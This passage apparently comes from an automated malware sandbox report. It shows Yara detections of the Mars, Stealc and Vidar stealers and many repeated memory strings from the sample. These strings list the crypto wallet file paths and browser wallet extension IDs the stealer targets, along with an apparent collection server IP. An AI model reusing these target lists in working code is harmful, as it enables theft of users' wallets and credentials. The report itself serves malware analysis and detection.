Source: Yara match File source: 00000008.00000002.2438251859.0000000000251000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3418913450.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2486002500.0000000000221000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2662971717.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 13.2.3eb62d09c2.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EZrw1nNIpG.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2385661873.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2514385520.0000000000D01000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2389921177.0000000001614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EZrw1nNIpG.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3eb62d09c2.exe PID: 7356, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 13.2.3eb62d09c2.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EZrw1nNIpG.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2385661873.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2514385520.0000000000D01000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EZrw1nNIpG.exe PID: 3792, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco_
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco_
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco_
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000164D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp$
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 